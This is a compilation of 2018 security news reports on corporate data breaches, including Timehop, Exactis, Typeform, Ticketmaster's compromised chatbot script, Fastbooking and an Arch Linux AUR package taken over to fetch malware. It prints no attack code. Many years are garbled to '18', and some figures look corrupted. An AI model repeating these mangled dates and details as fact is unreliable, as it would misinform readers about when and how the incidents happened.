Mike Thomas, a technologist at LabCorp, works with patient samples at the company’s location in Burlington. JULIE KNIGHT – Source www.bizjournals.com

The company is currently testing operations that have been resumed, other suctions will be fully restored in the next days, meantime some customers may face brief delays.

“We anticipate that additional systems and functions will be restored throughout the next several days,” it added. “Some customers of LabCorp Diagnostics may experience brief delays in receiving results as we complete that process.”

The hack might have severe consequences for millions of Americans due to the potential extent of the breached networks that connects thousands of hospitals and testing facility offices worldwide.


Britain to Fine Facebook Over Data Breach
18.7.18 securityweek  Incindent 
Social

Britain's data regulator said Wednesday it will fine Facebook half a million pounds for failing to protect user data, as part of its investigation into whether personal information was misused ahead of the Brexit referendum.

The Information Commissioner's Office (ICO) began investigating the social media giant earlier this year, when evidence emerged that an app had been used to harvest the data of tens of millions of Facebook users worldwide.

In the worst ever public relations disaster for the social media giant, Facebook admitted that up to 87 million users may have had their data hijacked by British consultancy firm Cambridge Analytica, which was working for US President Donald Trump's 2016 campaign.

Cambridge Analytica, which also had meetings with the Leave.EU campaign ahead of Britain's EU referendum in 2016, denies the accusations and has filed for bankruptcy in the United States and Britain.

"In 2014 and 2015, the Facebook platform allowed an app... that ended up harvesting 87 million profiles of users around the world that was then used by Cambridge Analytica in the 2016 presidential campaign and in the referendum," Elizabeth Denham, the information commissioner, told BBC radio.

Wednesday's ICO report said: "The ICO's investigation concluded that Facebook contravened the law by failing to safeguard people's information."

Without detailing how the information may have been used, it said the company had "failed to be transparent about how people's data was harvested by others".

The ICO added that it plans to issue Facebook with the maximum available fine for breaches of the Data Protection Act -- an equivalent of $660,000 or 566,000 euros.

Because of the timing of the breaches, the ICO said it was unable to impose penalties that have since been introduced by the European General Data Protection, which would cap fines at 4.0 percent of Facebook's global turnover.

In Facebook's case this would amount to around $1.6 billion (1.4 billion euros).

"In the new regime, they would face a much higher fine," Denham said.

- 'Doing the right thing' -

"We are at a crossroads. Trust and confidence in the integrity of our democratic processes risk being disrupted because the average voter has little idea of what is going on behind the scenes," Denham said.

"New technologies that use data analytics to micro-target people give campaign groups the ability to connect with individual voters. But this cannot be at the expense of transparency, fairness and compliance with the law."

In May, Facebook chief Mark Zuckerberg apologised to the European Parliament for the "harm" caused.

EU Justice Commissioner Vera Jourova welcomed the ICO report.

"It shows the scale of the problem and that we are doing the right thing with our new data protection rules," she said.

"Everyone from social media firms, political parties and data brokers seem to be taking advantage of new technologies and micro-targeting techniques with very limited transparency and responsibility towards voters," she said.

"We must change this fast as no-one should win elections using illegally obtained data," she said, adding: "We will now assess what can we do at the EU level to make political advertising more transparent and our elections more secure."

- Hefty compensation bill -

The EU in May launched strict new data-protection laws allowing regulators to fine companies up to 20 million euros ($24 million) or four percent of annual global turnover.

But the ICO said because of the timing of the incidents involved in its inquiry, the penalties were limited to those available under previous legislation.

The next phase of the ICO's work is expected to be concluded by the end of October.

Erin Egan, chief privacy officer at Facebook, said: "We have been working closely with the ICO in their investigation of Cambridge Analytica, just as we have with authorities in the US and other countries. We're reviewing the report and will respond to the ICO soon."

The British fine comes as Facebook faces a potential hefty compensation bill in Australia, where litigation funder IMF Bentham said it had lodged a complaint with regulators over the Cambridge Analytica breech -- thought to affect some 300,000 users in Australia.

IMF investment manager Nathan Landis told The Australian newspaper most awards for privacy breaches ranged between Aus$1,000 and Aus$10,000 (US$750-$7,500).

This implies a potential compensation bill of between Aus$300 million and Aus$3 billion.


Timehop Shares More Details on Data Breach
18.7.18 securityweek  Incindent

Timehop has shared additional details about the recent data breach that impacted roughly 21 million user accounts, including what the attackers did once they gained access to the company’s systems and what other type of information was compromised.

Timehop provides an application that shows users the photos, videos and posts they shared on the current day in previous years on Facebook, Instagram, Twitter and other websites.

Earlier this month, the company revealed that one or more malicious hackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users, which could have been leveraged to access a user’s posts on social networking websites.

In response to the incident, Timehop invalidated social media tokens to prevent abuse and instructed users to re-authenticate each service.

In an update posted on Wednesday, Timehop revealed that dates of birth, genders, and country codes were also compromised in the incident.

The investigation is ongoing, but so far the company believes the attacker gained access to 20.4 million names, 15.5 million dates of birth, 18.6 million email addresses, 9.2 million gender designations, and 4.9 million phone numbers. Timehop listed separately the number of impacted PII records covered by the recently introduced GDPR.

According to Timehop, the attacker first accessed its systems on December 19, 2017, after stealing an employee’s credentials for the company’s cloud computing environment. The unauthorized access came from an IP address in the Netherlands.

The hacker immediately started conducting reconnaissance, including scraping the list of roles and accounts, but the compromised environment had not stored any personal information.

Personal information was copied by Timehop to the compromised database in early April and the attacker only discovered it on June 22. On July 4, the hacker made a copy of the user database and then changed its password. These actions led to service disruptions and internal alerts being triggered, but it took nearly 24 hours for Timehop to determine that it had been breached after the first alert.

“[Timehop engineers] did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” Timehop said. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”


Arch Linux AUR Repository Compromised
12.7.18 securityweek  Incindent

A user-maintained Arch Linux AUR (Arch User Repository) software repository was pulled earlier this week after it was found to contain malware.

The repository was apparently compromised by an actor using the handle “xeactor” after its original maintainer abandoned it. The affected repo was a user-maintained PDF viewer called acroread.

The orphaned package was modified on June 7, when xeactor added to it a curl script to fetch and execute a malicious script from an attacker-controlled server. The result was the installation of a persistent program that causes systemd to start periodically.

The executed scripts were also found to include a component to gather various data on the compromised machine, including ID, CPU details, Pacman (package management utility) Information, and the output of uname –a and systemctl list-units.

The modification was reported on July 8 and the commits were reverted within hours by maintainer Eli Schwartz, who also suspended the offending account and removed two other packages. The affected packages are acrored 9.5.5-8, balz 1.20-3, and minergate 8.1-2.

Some of those who analyzed the modified code suggested that the changes might have been intended as a warning, because the script would create files in such a way that generated a lot of noise. Specifically, a compromised.txt file was created in root and all home folders.

However, the scripts could have been modified at any time to execute arbitrary code, thus turning malicious.

As Arch's Giancarlo Razzolini points out, the issue itself isn’t that severe, despite the attention it has already gathered. All those who download from AUR do so at their own risk, and such incidents could happen more often than not, he suggests.

“I'm surprised that this type of silly package takeover and malware introduction doesn't happen more often. This is why we insist users always download the PKGBUILD from the AUR, inspect it and build it themselves. Helpers that do everything automatically and users that don't pay attention, *will* have issues. You should use helpers even more so at your risk than the AUR itself,” Razzolini notes.

Late last month, the developers of the Gentoo Linux distribution informed users that one of their GitHub accounts was compromised and that attackers planted malicious code. Gentoo’s infrastructure and repository mirrors weren’t affected.


Timehop Data Breach Hits 21 Million Users
12.7.18 securityweek  Incindent

Timehop informed users late last week that hackers gained unauthorized access to some of its systems as part of an attack that impacts roughly 21 million accounts.

New York-based Timehop has created an application that shows users the photos, videos and posts they shared on the current day in previous years on Facebook, Instagram, Twitter and other websites. The app also allows users to share these memories with their friends.

Timehop hacked

According to Timehop, the attacker accessed a database storing usernames, phone numbers, email addresses and social media access tokens. The incident affects approximately 21 million accounts, but only social media access tokens were exposed for all of them. Roughly 4.7 million accounts included phone numbers.

The compromised tokens can allow a malicious actor to access some of the targeted user’s social media posts, but they do not provide access to private messages. Moreover, Timehop has highlighted that there is no evidence of any unauthorized access using these tokens.

“In general, Timehop only has access to social media posts you post yourself to your profile. However, it is important that we tell you that there was a short time window during which it was theoretically possible for unauthorized users to access those posts - again, we have no evidence that this actually happened,” Timehop said.

The compromised tokens have been invalidated so users will have to re-authenticate each service with Timehop, a process that will generate new tokens.

The breach was discovered on July 4, but an investigation conducted by the company showed that the attack started as early as December 19, 2017, when hackers obtained admin credentials for cloud computing services used by Timehop.

“This unauthorized user created a new administrative user account, and began conducting reconnaissance activities within our Cloud Computing Environment. For the next two days, and on one day in March, 18, and one day in June, 18, the unauthorized user logged in again and continued to conduct reconnaissance,” the company explained.

The malicious activity was detected on July 4 after the attacker accessed a production database and started transferring data, which triggered an alarm.

Timehop says it took just over two hours to contain the incident after it was detected. The company has launched an investigation in collaboration with law enforcement, an incident response firm, and a threat intelligence company. Timehop has published both high-level and more technical reports on the incident.

The company has also retained the services of GDPR specialists to help it address the implications of the breach in Europe.


Timehop data breach, data from 21 million users exposed
11.7.18 securityaffairs Incindent

Timehop, the service that aims to help people in finding new ways to connect with each other by analyzing past activities, has been hacked.
Timehop is a service that aims to help people in finding new ways to connect with each other by analyzing past activities.

“Timehop created the digital nostalgia category and continues to be THE team reinventing reminiscing for the digital era. We have more “old” photos and content than ever before, yet most of the internet focuses on “new”.” reads its website.

The Timehop service leverages posts from many social networks to build its own memory and use it to create new connections, but something went wrong.

The company admitted that data describing 21 million members may have been exposed.

Unknown attackers breached into its systems, the company discovered the intrusion while the hackers were exfiltrating the data.

“On July 4, 18, Timehop experienced a network intrusion that led to a breach of some of your data. We learned of the breach while it was still in progress, and were able to interrupt it, but data was taken. While our investigation into this incident (and the possibility of any earlier ones that may have occurred) continues, we are writing to provide our users and partners with all the relevant information as quickly as possible.” reads the data breach notification published by the company.

Stolen data includes names, email addresses, and some phone numbers, while no private/direct messages, financial data, or social media or photo content, or Timehop data including streaks were exposed.

The company pointed out that none of the users’ “memories,” – the social media posts & photos that Timehop stores, were accessed by the attackers.

The company admitted that hackers obtained access credential to its cloud computing environment, that incredibly was not protected by multifactor authentication.

The security team locked out the attackers two hours and nineteen minutes later its discovery.

The attackers also accessed the keys that let Timehop read and show you your social media posts (but not private messages), in response to the incident the IT staff at the company has deactivated them, this means that users will have to re-authenticate to their App.

timehop

The bad news is that the security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. Timehop tried to downplay the problem explaining that the tokens have been quickly revoked and currently don’t work.

“Second, we want to be clear that these tokens do not give anyone (including Timehop) access to Facebook Messenger, or Direct Messages on Twitter or Instagram, or things that your friends post to your Facebook wall. In general, Timehop only has access to social media posts you post yourself to your profile.” continues the company’s notification.“However, it is important that we tell you that there was a short time window during which it was theoretically possible for unauthorized users to access those posts – again, we have no evidence that this actually happened.“

Timehop is warning its users that provided a phone number for the authentication of taking additional security precautions with their cellular provider to ensure that their number cannot be ported.

The company now has taken steps to improve the security of its architecture, including the adoption of multifactor authentication to secure our authorization and access controls on all accounts.

Technical details about the incident have been published in this post.


Massive Breach at Data Broker Exactis Exposes Millions of Americans
2.7.18 securityweek  Incindent

Security Researcher Vinny Troia has discovered another sensitive database exposed on the internet. This one uses Elasticsearch, which allows easy data searching over the internet. Elasticsearch offers security including authentication and role-based access control -- but not all customers deploy it.

Troia was interested in Elasticsearch security and used Shodan to find U.S. Elasticsearch databases visible on the internet. According to a report in Wired, he found around 7,000. One stood out -- a database owned by Florida-based data broker firm Exactis and containing personal data on both consumers and businesses.

What makes this discovery exceptional was the sheer size of the database, the sensitivity of the content, and the complete lack of security. Precise details are difficult to ascertain, and Exactis has not been forthcoming with details. However, it appears to contain something like 340 million records (230 million on consumers and 110 million on business contacts); making it a far bigger potential breach than last year's Equifax breach.

The Exactis website claims the firm has consumer data on 218 million individuals and 110 million households. Eight-eight million have email addresses and matching postal addresses, and 112 million include residential phone numbers. Business data includes 21 million companies, 40 million postal addresses, 21 million records with email addresses and matching postal address, and 52 million with business phone numbers.

How much of this was exposed is not known, but it is potentially everything. It doesn't include social security numbers or payment details, but goes into great detail for each individual, including interests, habits and the age and gender of children. It apparently includes more than 400 variables ranging from religion, pets, whether a person smokes, to personal interests.

Troia reported his findings to both Exactis and the FBI; and the database is no longer accessible. However, there is no way of knowing whether anyone other than Troia also located and accessed the data. While Exactis sells this data to businesses to help compile compelling and personalized marketing campaigns, in the hands of cyber criminals the same data could equally be used to compile compelling and personalized phishing campaigns. Any hope that cyber criminals don't use Shodan in the same way and to the same effect as Troia is unfounded.

Robert Capps, VP and Authentication Strategist for NuData Security comments, "If U.S. citizens did not think their personal information has ever been compromised, this should convince them it definitely is. This latest breach blows up the 18 tab with 230-million records exposed in just one incident."

Chris Olson, CEO of The Media Trust, believes that government must now take a lead. "Data providers need to keep in mind that they are prime targets for cybercriminals who want to commit identity theft and have tools to find databases on publicly accessible servers. While we have yet to find out whether the data they have exposed on a public server has been misappropriated by malicious actors, the scope of and negligence behind this leak could prompt greater demand among already wary U.S. consumers for stronger regulations around data privacy like the EU's GDPR. Such regulations would restrict how personal data is not only stored but used in the U.S."

Carl Wright, chief revenue officer for AttackIQ, holds a similar view. "When a breach such as this occurs, it reinforces the need for government to hold these organizations accountable to the individuals impacted. This will be the only way to ensure that corporations take the necessary steps to secure consumer data. Corporations and government entities must be required to continuously prove that their cyber security protections are able to defeat or detect attackers."

This already happens in Europe with the EU's General Data Protection Regulation (GDPR). It seems to be beginning in the U.S. Yesterday, California Gov. Jerry Brown signed the California Consumer Privacy Act of 18 (Assembly Bill 375).

"With GDPR now in full effect," comments Richard Henderson, global security strategist at Absolute, "I've been expecting legislation such as this to start to reach consumer-focused states in the US for some time. Other states like New York and Massachusetts will likely follow suit and draft their own citizen-friendly data rights laws. Many individual states will not sit on their hands waiting for a federal initiative that may never come."

The California Act will not come into effect until the beginning of 2020 -- but it will undoubtedly make firms like Exactis re-evaluate what they do, how they do it, and how they secure it. The legislation says, for example, "The bill would require a business to make disclosures about the information and the purposes for which it is used. The bill would grant a consumer the right to request deletion of personal information and would require the business to delete upon receipt of a verified request, as specified."

Meanwhile, 'victims' of the Exactis breach are not waiting for the new law. A proposed class action was lodged in the Florida federal court on Thursday, claiming that Exactis made no attempt to follow best practice guidelines to protect the data. "Despite these well-publicized Senate and other expert reports, defendant failed to heed the recommendations, and inexplicably left its server -- and the personal information which rested thereon -- vulnerable and available to even the most basic cyberattack," claims the suit. It asserts negligence, unjust enrichment claims, and claims under Florida's Deceptive and Unfair Trade Practices Act, and seeks compensatory, punitive, and exemplary damages.

Referring to the California Act, Henderson adds, "I think we are on the threshold of a new period of customer-focused data protections. State and local governments have waited a long time for organizations to take care of this, and based on the colossal number of breaches and rampant digital thefts that continue to occur, they've had enough."


Typeform Data Breach Hits Many Organizations
2.7.18 securityweek  Incindent

Typeform, a Spain-based software-as-a-service (SaaS) company that specializes in online forms and surveys, has suffered a security breach that resulted in the data collected by its customers getting stolen.

According to a notice posted on its website, Typeform identified the breach on June 27 and addressed its cause roughly half an hour later. The company says an attacker has managed to download a backup file dated May 3 from one of its servers.

The compromised file stored names, email addresses and other pieces of information submitted by users through Typeform forms. Data collected after May 3, payment information, and passwords are not impacted, Typeform said.

UK-based mobile banking service Monzo is one of the impacted organizations. Monzo says the breach affects roughly 20,000 individuals, a vast majority of which only had their email address exposed. However, in some cases, information such as postcode, name of the old bank, Twitter username, university, city, age and salary range, and employer was also compromised. Monzo says it has ended its relationship with Typeform following the incident.

The Tasmanian Electoral Commission was also hit by this breach. The organization notes that while some of the stolen data is already public, the attacker may have also obtained names, addresses, email addresses, and dates of birth submitted by electors when applying for an express vote at recent elections.

The list of organizations that has notified customers of the Typeform breach also includes Thriva, Birdseye, HackUPC, and Ocean Protocol.

Typeform last year claimed to have 30,000 paying customers and many more using its free service. Companies such as Apple, Uber, Facebook, Adobe, Airbnb, WeTransfer and BBC are also said to have used its services at some point. The company’s website currently lists Trello, HubSpot, Indiegogo, Forbes, and Freshdesk as customers.

Typeform has assured customers that it has identified and addressed the source of the breach. The company claims it has initiated a comprehensive review of its system security and is taking “significant measures” to prevent such incidents from occurring in the future.

However, shortly after the data breach was disclosed, one Twitter user claimed to have identified another vulnerability in Typeform systems.


Data Broker Exactis data breach, one of the biggest ever, exposes millions of Americans
1.7.18 securityaffairs Incindent

Security expert Vinny Troia has found a huge trove of data belonging to millions of Americans that were left unsecured online.
The security researcher Vinny Troia was analyzing the level of security for Elasticsearch installs exposed online when discovered millions of records belonging to Americans that were left unsecured online.

The expert used Shodan to find U.S. Elasticsearch databases exposed on the internet, the query allowed him to discover around 7,000 instances. One of them immediately appeared very interesting, an archive owned by US data broker firm Exactis that was containing personal data on both consumers and businesses.

“Earlier this month, security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server. The haul comprises close to 2 terabytes of data that appears to include personal information on hundreds of millions of American adults, as well as millions of businesses.” reported Wired.

“While the precise number of individuals included in the data isn’t clear—and the leak doesn’t seem to contain credit card information or Social Security numbers—it does go into minute detail for each individual listed, including phone numbers, home addresses, email addresses, and other highly personal characteristics for every name.”

The archive was containing roughly 340 million records (230 million on consumers and 110 million on business contacts), this is probably the biggest potential breach ever seen.

According to Exactis website, the firm gathered consumer data on 218 million individuals and 110 million households.

The archive contains 88 million records that include email addresses and postal addresses, while 112 million records include residential phone numbers.

Business data includes 21 million records of companies, 40 million postal addresses, 21 million records with email addresses and postal address, and 52 million business phone numbers.

The good news is that the archive did not include credit card information or Social Security numbers.

Exactis data breach

At the time it is not clear how much the archive was exposed, but experts believe it was completely exposed online. The archive includes interests, habits and the age and gender of children, and more than 400 variables ranging from religion, pets, and whether a person smokes.

The knowledge of so detailed profiles could allow attackers to launch effective spear phishing campaigns.

The security expert promptly reported his findings to the FBI and Exactis, the company immediately secured the database.

Customers proposed a class action in the Florida federal court last week claiming that Exactis did not implement best practice guidelines to protect the data.


The popular online survey software Typeform suffered a security breach
30.6.18 securityaffairs Incindent

Typeform, the popular online survey platform, has suffered a data breach that exposed partial data of some users, no payment card data was stolen.

Typeform, the popular online survey platform, is the last victim of a data breach. Typeform software is widely adopted by businesses worldwide to easily arrange surveys, it allows easy creation of interfaces to collect user data.

The company has confirmed the security breach that exposed partial data of some users.

“On June 27, 18, our engineering team became aware that an unknown third party gained access to our server and downloaded certain information. As a result of this breach, some data was compromised. ” reads the data breach notification published by the company.

According to Typeform, no payment card data or password information for the website had been exposed in the security breach.

The Spanish firm discovered the intrusion on June 27th, and immediately launched an internal investigation.

The experts discovered that attackers accessed company servers and downloaded a partial data backups for surveys conducted before May 3rd, 18.

The company identified the vulnerability exploited by the hackers and patched it a few hours then it notified the incident to the affected users.

At the time there is no information about the flaw exploited by the hackers, the company highlighted that even if customers collected payments via Typeform’s Stripe integration, the payment details they have corrected are safe.

Typeform

One of Typeform’s customers, the digital mobile bank Monzo, confirmed confirmed that personal data of about 20,000 people are likely to have been exposed due to the security breach.

“Our initial investigations suggest that some personal data of about 20,000 people is likely to have been included in the breach.” reads the security advisory published by Monzo.

“For the vast majority of people, this was just their email address. For a much smaller proportion of others, this may have included other data like their Twitter username or postcode. We’ve published a full breakdown at the bottom of this post,”

Unfortunately, the number of data breaches continue to increase and a growing number of personal details are flooding the black marketplaces.

Yesterday the sportswear company Adidas announced potential data breach that affected millions of its U.S. customers while the global entertainment ticketing service Ticketmaster suffered the same problem.


Ticketmaster Blames Third Party Over Data Breach
29.6.18 securityweek  Incindent

Ticketmaster UK has had thousands of personal customer information compromised. This may include name, address, email address, telephone number, payment details and Ticketmaster login details, the company said.

How many accounts have been compromised has not been specified, although the company says in a statement, "Less than 5% of our global customer base has been affected by this incident;" adding, "Customers in North America have not been affected."

Details of the hack have not yet been disclosed other than it involved 'an unknown third-party'. The statement says that it identified malicious software on a support product hosted by Inbenta Technologies (part of Ticketmaster's supply chain). It did this on Saturday, June 23, and immediately 'disabled the Inbenta product across all Ticketmaster websites."

Ticketmaster clearly feels that Inbenta is at fault. Inbenta takes a slightly different view. In its own statement, CEO Jordi Torras, writes, "it has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster's particular requirements." The attackers located, modified, and used this script to extract the payment information of Ticketmaster customers processed between February and June 18.

But Torras adds, "Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customized script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability." In other words, it is Ticketmaster that is at fault.

James Romer, chief security architect at SecureAuth + Core Security, explains, "a customer service chatbot was compromised by malware and exported UK customers' data to an unknown third-party." In fact, the breach could extend to other nations. While Ticketmaster says, "we understand that only certain UK customers" are affected, it also says it is notifying all Ticketmaster International customers (outside of the U.S.) that they need to reset their passwords.

Ticketmaster has further concerns to consider. According to Monzo -- an online-only bank based in East London -- it warned Ticketmaster about a potential breach in early April. Monzo had detected fraudulent card activity that seemed to point to a Ticketmaster common factor. In a blog posted Thursday by Natasha Vernier, Monzo's head of financial crime, she explains that the bank reached out to Ticketmaster, and on 12 April, "members of the Ticketmaster security team visited the Monzo office so we could share the information we'd gathered. They told us they'd investigate internally."

Within a week, Monzo was sufficiently concerned and certain that it shared its information with the U.S. Secret Service, and started to proactively replace every Monzo customer card that had been used at Ticketmaster (about 6000).

One week after its security team visited Monzo's offices, Ticketmaster informed Monzo that it had found no evidence of a breach and that no other banks were reporting similar patterns. The breach wasn't actually found until some ten weeks after Monzo first raised its concerns.

"There are going to be a few eyebrows raised this morning about this breach and when Ticketmaster really discovered it," comments Tony Pepper, CEO and co-founder at Egress. Clearly data was at risk for some time, and apparently Ticketmaster had been alerted to the issue but didn't heed those warnings. It is going to be interesting to see how the ICO reacts when they get to the bottom of this, given the emphasis now placed on data breach reporting and reflected in the changes made under the GDPR."

This was a supply chain attack that took a long time to detect even when the company was told it had been breached. Supply chain attacks are increasing. "It's not uncommon for companies to be breached via a third-party supplier, which is why it's important to carefully consider who to work with and what security protocols they have in place," comments Andrew Bushby, UK director at Fidelis Cybersecurity.

It's worth noting that that the UK government's new Minimum Cyber Security Standard for government departments actually specifies that the supply chain should be required to meet the UK's Cyber Essentials level 6.

Joseph Carson wonders whether artificial intelligence will become embroiled in the case. "Many companies are using chat bots to help automate their customer experiences, having been lured into fancy buzzwords like machine learning, artificial intelligence and virtual assistance," he notes. While the theft of personal details, financial information and passwords means these are now available on the darknet for cybercriminals to abuse, he wonders what else might have been stolen. "It will be interesting to learn," he suggests, "whether the cybercriminals also accessed the artificial intelligence information that could be used for a more targeted type of attack."

The danger to victims of this breach is primarily twofold: fraudulent use of the stolen payment details, and more calculated identity theft. "The fact that payment card information has been caught up in this breach is hugely concerning," comments Brooks Wallace, Head of EMEA for Trusted Knight. "In cases like this, details often end up for sale on the dark web, rather than in the hands of the original hackers themselves, and then end up being used for fraudulent transactions and in some cases identity theft.

"When used to make transactions, fraudsters often start by testing small transactions here to make sure it works and then ramp up to bigger purchases. Anyone who thinks they may have been caught up in this breach needs to keep a very careful eye on their bank accounts and potentially should contact their bank to change their cards." In reality, any customer of Ticketmaster, whether a victim of this breach or not, will need to be wary of the inevitable opportunistic phishing emails that follow any such breach.

One aspect of this breach will only become clear over time: how will the European data protection regulators react in relation to the General Data Protection Regulation. It's a moot point since the actual breach occurred prior to the activation of GDPR, although internal recognition and victim notification both occurred within GDPR. The UK's ICO will probably treat the case similar to the Dixons Carphone breach: "It is early in the investigation. We will look at when the incident happened and when it was discovered as part of our work and this will inform whether it is dealt with under the 1998 or 18 Data Protection Acts."


Possible Data Breach at Adidas Could Impact Millions of U.S. Customers
29.6.18 securityweek  Incindent

German sportswear company Adidas on Thursday revealed that it launched an investigation after learning of a potential data breach that could impact millions of its U.S. customers.

In a notice posted on its website, Adidas said an unauthorized party claimed to have gained access to customer information. The company learned of the possible breach on June 26 and called in cybersecurity experts and law enforcement to assist in the investigation.

The unauthorized party may have obtained usernames, password hashes and contact information – which the company describes as “limited data” – of individuals who made purchases on Adidas’ US website, adidas.com/US.

Adidas says there is no evidence that credit card or fitness information has been compromised.

Adidas told some media outlets that the incident could impact “a few million” customers, but its statement suggests that not all customers in the United States are affected.

“While adidas continues its thorough forensic review, adidas is alerting relevant consumers,” the company stated.


Ticketmaster suffered a data breach and blamed a third-party provider over the incident
29.6.18 securityaffairs Incindent

The entertainment ticketing service Ticketmaster announced it has suffered a data breach that exposed personal and payment customer information.
Hackers accessed name, address, email address, telephone number, payment details and Ticketmaster login details of company customers.

According to the company, attackers installed a malicious code on customer support product hosted by Inbenta Technologies, an external third-party. Hackers compromised a third-party support customer service chat application deployed on the UK website to steal personal and payment information from customers that purchased tickets.

At the time, there is no information about the extent of the incident, experts believe that the incident may have affected tens of thousands of its customers.

“On Saturday, June 23, 18, Ticketmaster UK identified malicious software on a customer support product hosted by Inbenta Technologies, an external third-party supplier to Ticketmaster.” reads the data breach notification published by Ticketmaster.

“As soon as we discovered the malicious software, we disabled the Inbenta product across all Ticketmaster websites. Less than 5% of our global customer base has been affected by this incident. Customers in North America have not been affected.”

Ticketmaster

The ticketing service disabled the Inbenta support customer service chat application from all of its websites.

Inbenta Technologies denied any responsibility and blamed Ticketmaster for have installed its chat application improperly. The company explained that hackers have exploited a single piece of JavaScript code specifically customized for ticketing service company that installed it directly a without notifying Inbenta team.

“Upon further investigation by both parties, it has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster’s particular requirements. This code is not part of any of Inbenta’s products or present in any of our other implementations.” reads a statement published by Inbenta.

“Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customized script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability. The attacker(s) located, modified, and used this script to extract the payment information of Ticketmaster customers processed between February and June 18.”

The ticketing service has launched an investigation to determine the responsibility for the incident and is working with authorities, as well as financial institutions to limit the extent of the incident.


Fastbooking Hack Leaves Japan Hotel Red-Faced
28.6.18 securityweek Incindent

A Japanese hotel chain has apologised after more than 120,000 items of customer information were stolen in hacks of its reservations handled by French company Fastbooking.

Prince Hotel, a major Japanese hotel operator, said the breach occurred when hackers attacked Paris-based Fastbooking, which manages its foreign-language bookings.

A Fastbooking spokeswoman confirmed that the company had been hacked on June 14 and had not detected the attack until June 19.

"All of our markets have been affected but this represents a minority of our customers," she said.

She declining to say how many hotels were affected, but said Japanese data made up a large proportion of the hacked information.

Fastbooking, a subsidy of French multinational AccorHotels, handles reservations for some 4,000 hotels in 40 countries.

Prince Hotel said the server for its English, Chinese and Korean-language websites was hacked twice earlier this month and a total of 124,963 items of information such as names, credit card numbers and addresses were stolen.

"There was unauthorised access to the servers of Fastbooking in France," the hotel said in a statement.

The hotel said names, home addresses, phone numbers and other personal information of customers who had booked rooms between May and June 2017 were taken, and that credit card numbers were stolen from customers who had made reservations before August 2017.​

Prince Hotel president Masahiko Koyama apologised and bowed deeply at a press conference on Tuesday.

"We're deeply sorry for causing great concern and trouble," he said.

The hotel chain said it was suspending its websites until it could ensure their security.


FastBooking Hotel booking software firm suffered a data breach
28.6.18 securityaffairs Incindent

A security breach suffered by the Hotel booking software provider FastBooking has affected hundreds of hotels worldwide.
The Hotel booking software provider FastBooking is the last victim of a data breach, the incident exposed personal details and payment card data of guests from affected hotels.

FastBooking offers hotel booking platform to more than 4,000 hotels in 100 countries.

According to the experts, the number of impacted hotels worldwide could be greater than 1000, roughly 380 only in Japan. The company did not provide details about the number of affected users.

The company promptly notified via email the incident to each affected hotel providing details about the number of affected guests.

“Following the discovery of a suspicious application, the server log files were analyzed
(computer activity traces) and we found out that some files containing data had leaked.” reads a notice published by the company.

“Fastbooking immediately eradicated the vulnerability and took steps to prevent this
incident from recurring and to mitigate any negative consequences: implementing higher security standards, changing passwords on our systems, and so on.”

The attackers exploited a vulnerability in the web app to back into the FastBooking system.

The breach was discovered by company staff that noticed the presence of the malware on the server. The malware is a backdoor that allows the attacker to gain control over the server and steal the sensitive data.

FastBooking

The company notified the data breach via emails, hackers compromised the server on June 14 and installed a malware on the company server that was used to exfiltrate the precious data.

The hotel chain Prince Hotels & Resorts in Japan already notified the data breach to its customers. The hotel chain announced that the incident affected 124,963 guests who stayed at 82 of its hotels.

“This notice is to make you aware that Prince Hotels & Resorts reservations system in English, Simplified Chinese, Traditional Chinese, and Korean have been impacted by an unauthorized access to or acquisition of your personal information.” reads the data breach notification.

“We have learned that Fastbooking in France which is a parent company of Fastbooking Japan, our reservations system operator for international guests, had an unauthorized access.”

Below the incident timeline:
June 14, 18, 8:43 PM UTC – hackers breached FastBooking’s server.
June 19, 18, 3:40 PM UTC – The company discovers intrusion.
June 19, 18, 9:02 PM UTC – The company closes breach.

Experts believe this data breach could trigger a series of data breach notifications from all the affected hotels.


Flight tracking service Flightradar24 suffered a data breach
21.6.18 securityaffairs  Incindent

The popular flight tracking service Flightradar24 has discovered a data breach that affected one of its servers.
The company notified the incident to its users via email and asked them to change their passwords, affected users’ passwords have been reset.

FlightRadar24 promptly reported the incident to the Swedish Data Protection Authority in order to comply with the EU’s General Data Protection Regulation (GDPR).

According to Flightradar24, hackers may have accessed email addresses and password hashes associated with accounts registered prior to March 16, 2016.

At the time there is no information about the hashing algorithm that was used to protect the passwords,

Initially many users that received the message believed that the data breach notification was the result of a phishing campaign because there was no official news from Flightradar24, but later the company admitted the incident and confirmed that the emails were legitimate.

Senile Delinquent
@SenileDelinque1
18 Jun
@flightradar24 Is this for real or is a phishing expedition? Clicking on the Unsubscribe link at the end of the email takes me to an odd website. Anyone else had this? pic.twitter.com/3P0Lensv5B

Flightradar24

@flightradar24
Hello, it is legitimate. We have already invalidated your old password and the link in the email will allow you to create a new password. We apologize for any inconvenience this may cause.

4:13 PM - Jun 18, 18
1
See Flightradar24's other Tweets
Twitter Ads info and privacy
A moderator of the Flightradar24.com forum confirmed that no personal and financial information was exposed.

“We can confirm that the email some of our users received in regards to a security breach has been sent by us. The security breach may have compromised the email addresses and hashed passwords for a small subset of Flightradar24 users (those who registered prior to March 16, 2016).

We would like to apologize that this breach occurred and for the inconvenience this may cause. We would also like to stress that we have no indication any of personal information was compromised.” wrote a company spokesman on the official forum.

“The security breach was limited to one server and it was promptly shut down once the intrusion attempt had been ascertained. An email has been sent to users with affected accounts. Please note that no payment information has been compromised. Flightradar24 neither handles nor stores payment information.”

FlightRadar24

The company added that it has contained the incident, just after it discovered one of its servers was compromised it shut down the machine.

The bad news is that the company admitted that passwords were protected by an old hashing algorithm that allows attackers to crack the hashes, Flightradar24 introduced a more secure hashing algorithm only since 2016.

